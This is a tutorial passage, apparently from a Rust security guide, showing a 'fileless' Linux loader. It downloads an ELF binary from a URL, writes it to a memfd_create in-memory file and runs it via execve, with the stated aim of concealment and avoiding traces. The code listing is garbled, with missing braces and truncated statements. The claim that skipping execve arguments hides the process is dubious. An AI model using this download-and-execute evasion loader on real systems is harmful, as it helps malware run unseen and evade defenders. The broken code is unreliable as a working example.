Fileless on Linux

    In this section, we'll look at a Linux escape method that allows you to execute a file on the system using only process memory.

    This method uses the memfd_create function available in libc to create a file in memory. We'll then write an ELF file to this file, which we'll retrieve, in the following example, from an HTTP server.

    To use the memfd_create function, we'll use the crate libc and to make HTTP requests we'll use the reqwest library with the blocking feature, which allows us to access blocking functions (reqwest uses asynchronous functions by default):

    >>> cargo add libc
    >>> cargo add reqwest --features=blocking

    Here are our dependencies in our Cargo.toml file:

    libc = "0.2.151"
    reqwest = { version = "0.11.23", features = ["blocking"] }

    Here's our program:

    use std::ffi::CString;
    use libc::{memfd_create, write, execve, c_void, c_char, MFD_CLOEXEC};
    fn main() {
        let args: Vec<string> = std::env::args().collect();
        if args.len() != 2 {
            eprintln!("Usage: {} <ELF URL>", args.get(0).unwrap());
        // Retrieves the ELF file
        let url = args.get(1).unwrap();
        let client = reqwest::blocking::Client::builder()
        let content = client.get(url).send().expect("Could not get ELF from server").bytes().unwrap();
        // Create the memfd
        let file_name_tmp = CString::new("a.out").unwrap();
        let file_name = file_name_tmp.as_ptr();
        let fd = unsafe { memfd_create(file_name, MFD_CLOEXEC) };
        if fd == -1 {
            eprintln!("Could not create memfd");
        // writes ELF contents to memfd file
        let written = unsafe {
            write(fd, content.to_vec().as_ptr() as *const c_void, content.len())
        if written == 0 {
            eprintln!("Could not write to file descriptor");
        let elf_path = CString::new(format!("/proc/self/fd/{}", fd)).unwrap();
        unsafe {
            execve(elf_path.as_ptr() as *const c_char, std::ptr::null(), std::ptr::null());

    It first retrieves the ELF file from the HTTP server using the reqwest library, the URL in this example being specified as an argument. We're using a blocking HTTP client here, as we want to know what's in the file (and whether we can get it) before proceeding with any other action.

    It then calls the memfd_create function and populates the file it returns with the ELF file. It's important to note that calling memfd_create requires 2 parameters:

    1. the file name, this parameter is only useful for debugging purposes; here, we'll simply set it to "a.out".
    2. flags, which can be similar to those available with the open call, here we only use MFD_CLOEXEC, which indicates that the file returned by memfd_create will be closed when an exec is called (execve, for example).

    Once the ELF file has been written to memory, we'll execute it using execve, the file being available in the special /proc folder, which allows access to the memfd_create file as if it were on disk. For the sake of concealment, we don't specify any of the other parameters, which means we won't be visible in the process list. As the current process will be overwritten by execve, there will be no trace of this process.


    We'll run the following program (it-works.c) to demonstrate that our program works:

    #include <stdio.h>
    #include <unistd.h>
    int main() {
        puts("It works!");
        printf("PID: %d\n", getpid());
        return 0;
    >>> gcc it-works.c -o it-works
    >>> ./it-works 
    It works!
    PID: 40525

    This program can be accessed via the URL "http://localhost:8000/it-works".

    Here's how it looks when our program is launched and the binary is retrieved:

    >>> cargo run http://localhost:8000/it-works
        Finished dev [unoptimized + debuginfo] target(s) in 0.03s
         Running `target/debug/memfd_exec 'http://localhost:8000/it-works'`
    It works!
    PID: 40664